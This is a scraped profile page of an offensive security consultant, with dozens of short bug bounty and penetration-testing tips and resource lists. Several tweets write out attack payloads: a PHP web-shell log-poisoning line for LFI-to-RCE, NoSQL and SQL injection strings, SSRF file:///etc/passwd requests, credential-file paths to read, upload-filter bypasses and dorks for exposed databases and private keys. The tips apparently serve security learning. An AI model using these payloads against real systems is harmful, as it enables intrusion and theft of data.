Tushar Verma 🇮🇳 Profile Banner
Tushar Verma 🇮🇳 Profile
Tushar Verma 🇮🇳

@e11i0t_4lders0n

Followers
20,562
Following
826
Media
409
Statuses
3,275

Offensive Security Consultant at NST-Cyber | @SynackRedTeam Member | Public Speaker | Open for Freelance Engagements

Mumbai, India
Joined March 2020
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
@e11i0t_4lders0n
Tushar Verma 🇮🇳
2 years
How to start Bug Bounty Hunting Follow this thread 🧵 Note:I m assuming that you have cleared your basics #bugbounty #bugbountytip #bugbountytips
61
385
1K
@e11i0t_4lders0n
Tushar Verma 🇮🇳
2 years
Stop trying every tools you get on internet, stick to one tool and try to use maximum of it to get results Just for an example: Ffuf Refer these resources: #bugbounty #bugbountytip #bugbountytips
Tweet media one
50
215
785
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
Labs for Web application Pentesting Practice SQLi- Oauth 2.0- GraphQL- JWT Authentication- SAML Authentication- XSS- #bugbounty
4
380
744
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
Checklist and Cheatsheets WAPT- Authenication- Oauth Misconfiguration- File Upload- IDOR- XSS- #bugbountytips
10
390
707
@e11i0t_4lders0n
Tushar Verma 🇮🇳
2 years
GitHub Recon for Bug Bounty A thread 🧵 #bugbounty #bugbountytip #bugbountytips
57
246
584
@e11i0t_4lders0n
Tushar Verma 🇮🇳
2 years
Bug Bounty Free Learning Materials Follow this thread if you can’t google and learn things😅 #bugbounty #bugbountytip #bugbountytips
47
272
572
@e11i0t_4lders0n
Tushar Verma 🇮🇳
2 years
Shodan Dorks for Finding Sensitive Data "MongoDB Server Information" port:27017 -authentication "Set-Cookie: mongo-express=" "200 OK" mysql port:"3306" port:"9200" all:"elastic indices" port:5432 PostgreSQL proftpd port:21 #bugbounty #bugbountytip #bugbountytips
31
252
552
@e11i0t_4lders0n
Tushar Verma 🇮🇳
2 years
SQLi Manual Approach Thread 🧵 #bugbounty #bugbountytip #bugbountytips
66
257
553
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
Thick Client Penetration Testing Tools 1-Interception proxies: - Burp Suite - Fiddler - Echo Mirage - Charles - Mallory - JavaSnoop 2-Traffic Analysis: - TCPDump - Wireshark 3-Static Tools -CFF Explorer -PEid -Detect It Easy (DIE)
8
198
552
@e11i0t_4lders0n
Tushar Verma 🇮🇳
2 years
Google Dorks for Bug Bounty 1-allintext:username filetype:log 2-inurl:/proc/self/cwd 3-intitle:"index of" inurl:ftp 4-filetype:log username putty 5-filetype:xls inurl:"email.xls" 6-intitle:index.of id_rsa -id_rsa.pub 7-"index of" "" #bugbountytips
34
217
541
@e11i0t_4lders0n
Tushar Verma 🇮🇳
4 months
Advance Web Application Penetration Testing Checklist Notion Link: #bugbounty #bugbountytip #bugbountytips
Tweet media one
5
187
542
@e11i0t_4lders0n
Tushar Verma 🇮🇳
8 months
This post is for all beginners who are stuck after solving @PortSwigger Academy. So i have just created a list ( @hackthebox_eu )which u can refer & follow after you are done with your basics from @PortSwigger & @PentesterLab .
Tweet media one
9
160
489
@e11i0t_4lders0n
Tushar Verma 🇮🇳
2 years
Burp Extension for Broken Access Control Thread 🧵 #bugbounty #bugbountytip #bugbountytips
35
198
465
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
Payloads for NoSQL Injection true, $where: '1 == 1' , $where: '1 == 1' $where: '1 == 1' ', $where: '1 == 1 1, $where: '1 == 1' { $ne: 1 } ', $or: [ {}, { 'a':'a ' } ], $comment:'successful MongoDB injection' db.injection.insert({success:1}); #bugbounty #bugbountytips
2
177
462
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
If an LFI vulnerability exists, look for these files: 1-Linux system and user files: /etc/passwd /etc/shadow /etc/issue /etc/group /etc/hostname /home/user/ /home/user/.ssh /home/user/bash_history #bugbounty #bugbountytip #bugbountytips
7
176
444
@e11i0t_4lders0n
Tushar Verma 🇮🇳
2 years
Burp Extension for XSS Thread 🧵 #bugbounty #bugbountytip #bugbountytips
36
173
434
@e11i0t_4lders0n
Tushar Verma 🇮🇳
2 years
Bug Bounty Free Training Total Session: 0 Self Learning Ethical Hacking basics: Burpsuite: Bugcrowd VRT - Google @Bugcrowd VRT Vulnerabilities Checklist:
Tweet media one
18
175
428
@e11i0t_4lders0n
Tushar Verma 🇮🇳
4 years
Tweet media one
13
198
416
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
LFI to RCE via SSH Log File Poisoning (PHP) url: http//10.10.10.10/index.php?file=../../../../../../../var/log/auth.log payload: ssh <?php system($_GET['c']);?>@<target_ip> execute RCE: http//10.10.10.10/index.php?file=../../../../../../../var/log/auth.log&c=id #bugbounty
2
161
406
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
Most of the penetration testers need a tool to generate reports and deliver an understandable document to their clients! Try this open-source tool
3
144
376
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
Thick Client Pentesting Mindmap
Tweet media one
8
141
365
@e11i0t_4lders0n
Tushar Verma 🇮🇳
2 years
When looking for IDORs and have 401/403 errors, some bypasses : - Wrap ID with an array {“id”:111} --> {“id”:[111]} - JSON wrap {“id”:111} --> {“id”:{“id”:111}} - Send ID twice URL?id=<LEGIT>&id=<VICTIM> - Send wildcard {""user_id"":""*""}
5
114
351
@e11i0t_4lders0n
Tushar Verma 🇮🇳
4 years
Web Security Topics for selfstudy: @ADITYASHENDE17 @impratikdabhi @manas_hunter @InfoSecComm @udit_thakkur "Credit Goes to Owner"
Tweet media one
12
143
350
@e11i0t_4lders0n
Tushar Verma 🇮🇳
2 years
Drop ur favourite tools you use during bug bounty hunting🙂
45
91
346
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
AWS Security Testing Checklist =Identity and Access Management 1-Ensure multi-factor authentication (MFA) is enabled for all IAM users that have a console password 2-Ensure credentials unused for 90 days or greater are disabled
10
143
341
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
Azure Pentesting Tools 1-Enumeration o365creeper CloudBrute cloud_enum Azucar CrowdStrike Reporting Tool for Azure (CRT) ScoutSuite BlobHunter Grayhat Warfare
3
133
337
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
File Upload Tricks -Use double extensions: .jpg.php -Use reverse double extension: .php.jpg -Mix uppercase and lowercase: .pHp, .pHP5, .PhAr -Null byte: .php%00.png, .php\x00.png -Multiple dots: file.php...... -Whitespace characters: file.php%20 #BugBounty #bugbountytips
4
140
337
@e11i0t_4lders0n
Tushar Verma 🇮🇳
2 years
Facing problem in making your own recon methodology Follow this thread 🧵 #bugbounty #bugbountytip #bugbountytips
51
174
336
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
Which application do you prefer for taking down notes, well I use @NotionHQ
Tweet media one
42
45
327
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
Business Logic Vulnerabilities Resources Blogs #bugbountytip #bugbountytips
5
202
322
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
Resources for Cloud Security(AWS,GCP,Azure) Plz share😊
16
96
319
@e11i0t_4lders0n
Tushar Verma 🇮🇳
2 years
I am planning to mentor(guide) 2 Students free of cost who are new into Penetration Testing/Bug Bounty Comment these things in this post: 1-Why you need this? 2-Your career plan? 3-Your Public Profile(BugBounty/HTB/THM) You can retweet this for maximum reach #bugbounty
116
100
316
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
Checklist Android Application Penetration Testing Checklist by @harshbothra_ Web Application Penetration Testing Checklist Infrastructure Pentesting Checklist by @purab_parihar
4
130
300
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
Infrastructure Pentesting
0
156
297
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
Docker/Kubernetes Pentesting
2
122
291
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
How i Got 3 SQL injection in just 10 minutes by @XDev05
10
141
290
@e11i0t_4lders0n
Tushar Verma 🇮🇳
2 years
Authentication and Authorization Testing Mindmap #applicationsecurity #appsec #infosec
Tweet media one
1
137
277
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
Slides of my talk on "Hacking OAuth Application"
2
85
278
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
SSRF exploitation via URL Scheme 1-File:Allows an attacker to fetch the content of a file on the server file://path/to/file file:///etc/passwd file://\/\/etc/passwd ssrf.php?url=file:///etc/passwd #bugbounty #bugbountytips #bugbountytip
3
117
278
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
Tweet media one
0
109
268
@e11i0t_4lders0n
Tushar Verma 🇮🇳
4 years
Trick for finding sensitive Information @ADITYASHENDE17 @manas_hunter @udit_thakkur Credit- @RazzSecurity
Tweet media one
5
93
262
@e11i0t_4lders0n
Tushar Verma 🇮🇳
6 months
New Updates on my web application penetration checklist 1-Wordpress Common Vulns 2-403 bypass techniques 3-Burp Suite Extensions Link: #BugBounty #bugbountytip #bugbountytips
2
90
266
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
Cloud Security Resources
1
110
260
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
With the help of google dorks, we can easily find bypasses 1-Normal search: <wafname> waf bypass 2-Searching for specific version exploits: "<wafname> <version>" (bypass|exploit) 3-For specific type bypass exploits: "<wafname>" +<bypass type> (bypass|exploit)
3
114
253
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
Finding The Real Origin IPs Hiding Behind CloudFlare or Tor
2
93
244
@e11i0t_4lders0n
Tushar Verma 🇮🇳
4 years
As a beginner,i faced lot's of difficulties in finding one single bug,i searched everywhere abt any checklist but none were available.After 3months of hardwork & constant support of @impratikdabhi @ADITYASHENDE17 @udit_thakkur @manas_hunter finally made my Bug hunting checklist
Tweet media one
12
70
240
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
One of the best ways to confirm a SQL injection is by making it operate a logical operation and having the expected results. For example: if the GET parameter ?username=Peter returns the same content as ?username=Peter' or '1'='1 then, you found a SQL injection. #bugbountytips
2
83
240
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
Different tricks to turn your LFI into RCE 1-Using file upload forms/functions 2-Using the PHP wrapper expect://command 3-Using the PHP wrapper php://file 4-Using the PHP wrapper php://filter 5-Using PHP input:// stream 6-Using data://text/plain;base64,command #bugbountytips
1
94
227
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
File Upload Restriction Bypass Checklist 1-Try various file extensions-Try different versions of the file extensions, for example php3, .php4, .php5, phtml for PHP scripts, asp,aspx #bugbounty #bugbountytip #bugbountytips
5
100
226
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
How to find an RCE in a Bug Bounty Program There are two common situations where a Remote Code Execution can occur: #bugbounty #bugbountytips #bugbountytip
2
71
216
@e11i0t_4lders0n
Tushar Verma 🇮🇳
2 years
Drop resources for learning Bash Scripting
35
45
216
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
Burp Suite: Match And Replace by @theXSSrat
1
87
216
@e11i0t_4lders0n
Tushar Verma 🇮🇳
2 years
IDOR Entry Points 1-Profile URL’s or ID’s 2-Password reset functions (great for privilege escalation) 3-Numeric parameters 4-Predictable parameters #bugbounty #bugbountytip #bugbountytips
10
73
212
@e11i0t_4lders0n
Tushar Verma 🇮🇳
2 years
Burp Extension for Deserialization Thread 🧵 #bugbounty #bugbountytip #bugbountytips
17
67
213
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
GraphQL Vulnerabilities 1-Parsing Vulnerabilities 2-Normalization Issues 3-Operation Validation Errors 4-Denial of Service Attacks 5-GraphQL SQL Injection Vulnerability 6-Authentication Vulnerabilities 7-GraphQL Authorization traversal attack #bugbounty #bugbountytips
1
89
210
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
Docker Security Cheat Sheet 1-Keep Host and Docker up to date 2-Set a user 3-Limit capabilities (Grant only specific capabilities, needed by a container) 4-Add –no-new-privileges flag 5-Disable inter-container communication (--icc=false)
3
77
206
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
Windows DLL Injection Basics DLL injection is the process of inserting code into a running process. The code we usually insert is in the form of a dynamic link library(DLL) DLL injection into four steps:
6
59
207
@e11i0t_4lders0n
Tushar Verma 🇮🇳
2 years
How I was able to bypass OTP code requirement in Razer [The story of a critical bug]
2
51
200
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
If you find SQL Injection in any program or product always check for the current database user role.If the user is a root and has the file write permission,we can upload a malicious file via SQL statement. #bugbountytip #bugbountytips
10
39
202
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
WHERE TO LOOK FOR XXE? 1-Functionality that parses SVG files 2-Functionality that parses sitemap.xml files 3-SAML Authentication 4-HTML parsing 5-SOAP APIs 6-XML APIs #bugbounty #bugbountytip #bugbountytips
2
86
204
@e11i0t_4lders0n
Tushar Verma 🇮🇳
2 years
Cloud Security Threats 1-Insecure APIs 2-Outdated software 3-Misconfigurations on the cloud 4-Stolen credentials 5-Access privileges
0
47
196
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
DevSecOps Automation 1-Static Application Security Testing (SAST) -SonarQube -CxSAST (Checkmarx) -Fortify -Veracode Static Analysis (Veracode)
4
59
198
@e11i0t_4lders0n
Tushar Verma 🇮🇳
2 years
Where do IDORs commonly found? -REST APIs -GET parameters -POST request bodies -GraphQL endpoints -PUT parameters -IDs in the request header -IDs in the cookies
4
63
192
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
Slides for my talk at @thecybergrabs GrabCon Exploiting SSRF like a Boss
4
76
192
@e11i0t_4lders0n
Tushar Verma 🇮🇳
3 years
AWS S3 Bucket Misconfiguration 1-Bucket takeover-If an application is using a domain-linked S3 bucket that has been deleted by developers and CNAME records from Amazone Route 53 are still pending deletion,you can claim this unclaimed S3 bucket name by using an other AWS account
1
72
186
@e11i0t_4lders0n
Tushar Verma 🇮🇳
11 months
I have started preparing the beginner’s content for getting started in bug bounty. It will take time for me to collect all the resources at one place. So I thought to upload the work and keep updating on every weekend during my free time to help every beginner Link: 👇🏻
Tweet media one
5
41
188